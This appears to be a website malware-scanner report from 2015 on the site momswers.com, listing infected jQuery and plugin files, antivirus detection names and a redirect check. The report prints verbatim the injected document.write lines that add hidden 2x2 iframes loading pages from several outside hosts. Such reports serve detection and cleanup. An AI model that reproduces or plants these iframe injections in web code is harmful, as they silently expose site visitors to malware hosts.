Malware Scanner report for momswers.com

Malicious/Suspicious/Total urls checked: 10/0/13

10 pages have malicious code. See details below

Blacklists: Found

The website is marked by Google as suspicious.

The website "momswers.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/30/30

30 suspicious iframes found. See details below

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=momswers.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

Request	Server response	Status
http://momswers.com/	200 OK Content-Length: 20477 Content-Type: text/html	clean
http://momswers.com/js/jquery-1.4.2.min.js	200 OK Content-Length: 72652 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=16 ... 3178 bytes are skipped ...null:this;if(c.isFunction(f))return this.each(function(j){var i=c(this);i[d](f.call(this,j,i[d]()))});return"scrollTo"in e&&e.document?e.document.compatMode==="CSS1Compat"&&e.document.documentElement["client"+b]\|\|e.document.body["client"+b]:e.nodeType===9?Math.max(e.documentElement["client"+b],e.body["scroll"+b],e.documentElement["scroll"+b],e.body["offset"+b],e.documentElement["offset"+b]):f===w?c.css(e,d):this.css(d,typeof f==="string"?f:f+"px")}});A.jQuery=A.$=c})(window); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668> Hidden iFrame found. size: 2x2 src: http://lindsethcpas.com/aced.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554>
http://momswers.com/js/fancybox/jquery.mousewheel-3.0.2.pack.js	200 OK Content-Length: 1636 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=16 ... 278 bytes are skipped ...ouseScroll","mousewheel"];b.event.special.mousewheel={setup:function(){if(this.addEventListener)for(var a=c.length;a;)this.addEventListener(c[--a],d,false);else this.onmousewheel=d},teardown:function(){if(this.removeEventListener)for(var a=c.length;a;)this.removeEventListener(c[--a], d,false);else this.onmousewheel=null}};b.fn.extend({mousewheel:function(a){return a?this.bind("mousewheel",a):this.trigger("mousewheel")},unmousewheel:function(a){return this.unbind("mousewheel",a)}})})(jQuery); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668> Hidden iFrame found. size: 2x2 src: http://lindsethcpas.com/aced.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554>
http://momswers.com/js/fancybox/jquery.fancybox-1.3.1.js	200 OK Content-Length: 27501 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://speardiver.com/ocef.html?j=1604668></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heof.html? ... 3514 bytes are skipped ... transitionOut : 'fade', speedIn : 300, speedOut : 300, changeSpeed : 300, changeFade : 'fast', easingIn : 'swing', easingOut : 'swing', showCloseButton : true, showNavArrows : true, enableEscapeButton : true, onStart : null, onCancel : null, onComplete : null, onCleanup : null, onClosed : null }; $(document).ready(function() { fancybox_init(); }); })(jQuery); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heof.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heof.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://speardiver.com/ocef.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://speardiver.com/ocef.html?j=1604668> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554>
http://momswers.com/js/jCarouselLite.js	200 OK Content-Length: 14613 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=16 ... 4399 bytes are skipped ... [] ).addClass("disabled"); } } return false; }; }); }; function css(el, prop) { return parseInt($.css(el[0], prop)) \|\| 0; }; function width(el) { return el[0].offsetWidth + css(el, 'marginLeft') + css(el, 'marginRight'); }; function height(el) { return el[0].offsetHeight + css(el, 'marginTop') + css(el, 'marginBottom'); }; })(jQuery); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668> Hidden iFrame found. size: 2x2 src: http://lindsethcpas.com/aced.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=1604679>
http://momswers.com/js/jquery.easing.1.1.js	200 OK Content-Length: 3773 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=16 ... 2919 bytes are skipped ...: function(x, t, b, c, d) { var s=1.70158; return c(t/=d)t((s+1)t - s) + b; }, backout: function(x, t, b, c, d) { var s=1.70158; return c((t=t/d-1)t((s+1)t + s) + 1) + b; }, backinout: function(x, t, b, c, d) { var s=1.70158; if ((t/=d/2) < 1) return c/2(tt(((s=(1.525))+1)t - s)) + b; return c/2((t-=2)t(((s=(1.525))+1)t + s) + 2) + b; }, linear: function(x, t, b, c, d) { return c*t/d + b; } }; Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668> Hidden iFrame found. size: 2x2 src: http://lindsethcpas.com/aced.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554>
http://momswers.com/js/jquery-ui-1.8.2.datepicker/jquery-ui-1.8.2.custom.min.js	200 OK Content-Length: 52229 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=16 ... 3195 bytes are skipped ...=2)a(((g=1.525)+1)a+g)+2)+b},easeInBounce:function(c,a,b,d,e){return d-f.easing.easeOutBounce(c,e-a,0,d,e)+b},easeOutBounce:function(c,a,b,d,e){return(a/=e)<1/2.75?d7.5625aa+b:a<2/2.75?d(7.5625(a-=1.5/2.75)a+0.75)+b:a<2.5/2.75?d(7.5625(a-=2.25/2.75)a+0.9375)+b:d(7.5625(a-=2.625/2.75)a+0.984375)+b},easeInOutBounce:function(c,a,b,d,e){if(a<e/2)return f.easing.easeInBounce(c,a2,0, d,e)0.5+b;return f.easing.easeOutBounce(c,a2-e,0,d,e)0.5+d*0.5+b}})}(jQuery); ; Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> Hidden iFrame found. size: 2x2 src: http://lindsethcpas.com/aced.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668>
http://momswers.com/js/jquery.tools.min.js	200 OK Content-Length: 45209 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://speardiver.com/ocef.html?j=1604668></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heof.html? ... 3176 bytes are skipped ...X:a.pageX,pageY:a.pageY});case "DOMMouseScroll":b.extend(a,a.data);a.delta=-a.detail/3;break;case "mousewheel":a.delta=a.wheelDelta/120;break}a.type="wheel";return b.event.handle.call(this,a,a.delta)}b.fn.mousewheel=function(a){return this[a?"bind":"trigger"]("wheel",a)};b.event.special.wheel={setup:function(){b.event.add(this,d,c,{})},teardown:function(){b.event.remove(this, d,c)}};var d=!b.browser.mozilla?"mousewheel":"DOMMouseScroll"+(b.browser.version<"1.9"?" mousemove":"")})(jQuery); Antivirus reports: Qihoo-360 Trojan.Generic AntiVir HTML/TwitScroll.B Avast JS:Iframe-EHO [Trj] Ad-Aware Trojan.Iframe.CEG Ikarus Exploit.HTML.IframeRef nProtect Trojan.Iframe.CEG Emsisoft Trojan.Iframe.CEG (B) Comodo TrojWare.JS.Iframe.FK McAfee-GW-Edition JS/IFrame.gen.j DrWeb JS.IFrame.473 Microsoft Exploit:HTML/IframeRef.DM Kaspersky HEUR:Trojan.Script.Generic MicroWorld-eScan Trojan.Iframe.CEG Fortinet JS/Iframe.HH!tr McAfee JS/IFrame.gen.j NANO-Antivirus Trojan.Html.TwitScroll.bklyhq F-Secure Trojan.Iframe.CEG VIPRE Malware.JS.Generic (JS) F-Prot IFrame.gen AVG HTML/Framer Norman Iframe.YR Sophos Troj/Iframe-JG GData Trojan.Iframe.CEG Symantec Trojan.Maliframe!html Commtouch IFrame.gen ESET-NOD32 JS/Iframe.JE BitDefender Trojan.Iframe.CEG Hidden iFrame found. size: 2x2 src: http://newridgetech.com/heof.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://newridgetech.com/heof.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> Hidden iFrame found. size: 2x2 src: http://speardiver.com/ocef.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://speardiver.com/ocef.html?j=1604668>
http://momswers.com/js/jquery.uniform/jquery.uniform.min.js	200 OK Content-Length: 6429 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=16 ... 3089 bytes are skipped ...meClass);btnTag=k.siblings(c.fileBtnClass);m.removeClass(c.hoverClass+" "+c.focusClass+" "+c.activeClass);l.text(k.val());if(k.is(":disabled")){m.addClass(c.disabledClass)}else{m.removeClass(c.disabledClass)}}}}}})};return this.each(function(){if(a.support.selectOpacity){var i=a(this);if(i.is("select")){if(i.attr("multiple")!=true){if(i.attr("size")==undefined\|\|i.attr("size")<=1){b(i)}}}else{if(i.is(":checkbox")){d(i)}else{if(i.is(":radio")){f(i)}else{if(i.is(":file")){g(i)}}}}}})}})(jQuery); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> Hidden iFrame found. size: 2x2 src: http://lindsethcpas.com/aced.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668>
http://momswers.com/js/jquery.cookie.js	200 OK Content-Length: 4735 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://speardiver.com/ocef.html?j=1604668></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://www.3dcgianimation.com/omzd ... 1265 bytes are skipped ...br/> var cookies = document.cookie.split(';'); for (var i = 0; i < cookies.length; i++) { var cookie = jQuery.trim(cookies[i]); if (cookie.substring(0, name.length + 1) == (name + '=')) { cookieValue = decodeURIComponent(cookie.substring(name.length + 1)); break; } } } return cookieValue; } }; Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://www.3dcgianimation.com/omzd.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://www.3dcgianimation.com/omzd.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554> Hidden iFrame found. size: 2x2 src: http://speardiver.com/ocef.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://speardiver.com/ocef.html?j=1604668>
http://momswers.com/js/main.js	200 OK Content-Length: 2889 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554></iframe>'); document.write('<iframe name=Twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=16 ... 2159 bytes are skipped ...); $(function() { $("#datepicker").datepicker({ showOn: 'button', buttonImage: 'js/jquery-ui-1.8.2.datepicker/smoothness/images/calendar.gif', buttonImageOnly: true }); }); $(function(){ $("select").uniform(); }); $(function() { $("a.lightbox").fancybox({ 'titleShow' : false, 'transitionIn' : 'elastic', 'transitionOut' : 'elastic' }); }); }); Antivirus reports: Norman Iframe.UW Hidden iFrame found. size: 2x2 src: http://hecodat.de/zwmd.html?j=1604668 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://hecodat.de/zwmd.html?j=1604668> Hidden iFrame found. size: 2x2 src: http://lindsethcpas.com/aced.html?j=1604679 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://lindsethcpas.com/aced.html?j=1604679> Hidden iFrame found. size: 2x2 src: http://ajacofurniture.com/eaod.html?j=3256554 <iframe name=twitter scrolling=auto frameborder=no align=center height=2 width=2 src=http://ajacofurniture.com/eaod.html?j=3256554>
http://millerusa.net/868779.js	404 Not Found Content-Length: 9 Content-Type: text/html	clean
http://millerusa.net/test404page.js	404 Not Found Content-Length: 9 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: momswers.com

Result:
HTTP/1.1 200 OK
Connection: close
Date: Tue, 27 Jan 2015 14:58:27 GMT
Accept-Ranges: bytes
Server: Apache
Content-Length: 20477
Content-Type: text/html

...20477 bytes of data.

Second query (visit from search engine):
GET / HTTP/1.1
Host: momswers.com
Referer: http://www.google.com/search?q=momswers.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Recently found suspicious websites

Malware Scanner report for momswers.com

Malware & Hack Repair

Website Hack Insurance

Safe Browsing / Blacklists

Scanned pages/files

Malicious Redirects

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools